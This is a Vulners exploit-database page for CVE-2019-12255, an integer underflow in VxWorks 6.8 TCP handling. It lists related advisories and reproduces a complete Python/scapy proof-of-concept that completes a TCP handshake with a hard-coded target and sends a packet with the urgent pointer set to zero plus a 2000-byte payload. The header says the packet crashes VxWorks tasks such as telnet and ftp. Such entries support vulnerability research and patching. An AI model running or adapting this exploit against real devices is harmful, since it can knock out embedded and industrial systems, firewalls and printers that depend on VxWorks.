Vulners
Lucene search
VxWorks 6.8 Integer Underflow
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow Exploit | 12 Aug 201900:00 | – | zdt |
 | VxWorks 6.x < 6.9.4 Multiple Vulnerabilities (URGENT/11) | 29 Jul 201900:00 | – | nessus |
| Windriver Vxworks Improper Restriction of Operations within the Bounds of a Memory Buffer | 8 Nov 201900:00 | – | nessus |
| SonicWall SonicOS Firewall Multiple Management Vulnerabilities (URGENT/11) | 29 Jul 201900:00 | – | nessus |
| ABB Integer Underflow in Wind River VxWorks (CVE-2019-12255) | 10 May 202300:00 | – | nessus |
| Hirschmann HiOS Switches Integer Underflow (CVE-2019-12255) | 10 Jun 202400:00 | – | nessus |
| Siemens Integer Underflow in Wind River VxWorks (CVE-2019-12255) | 7 Feb 202200:00 | – | nessus |
| Wind River VxWorks Multiple Vulnerabilities (URGENT/11) | 29 Jul 201900:00 | – | nessus |
| Xerox WorkCentre Multiple Vulnerabilities (XRX19-016) (URGENT/11) | 29 Jul 201900:00 | – | nessus |
 | BSA-2019-840 | 30 Jul 201900:00 | – | broadcom |
10
`# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
# Discovered By: Armis Security
# PoC Author: Zhou Yu (twitter: @504137480)
# Vendor Homepage: https://www.windriver.com
# Tested on: VxWorks 6.8
# CVE: CVE-2019-12255
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
from scapy.all import *
if __name__ == "__main__":
ip = "192.168.10.199"
dport = 23
seq_num = 1000
payload = "\x42"*2000
sport = random.randint(1024,65535)
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
syn_ack = sr1(syn)
seq_num = seq_num + 1
ack_num = syn_ack.seq+1
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
send(ack)
psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
send(psh)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2019 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.82215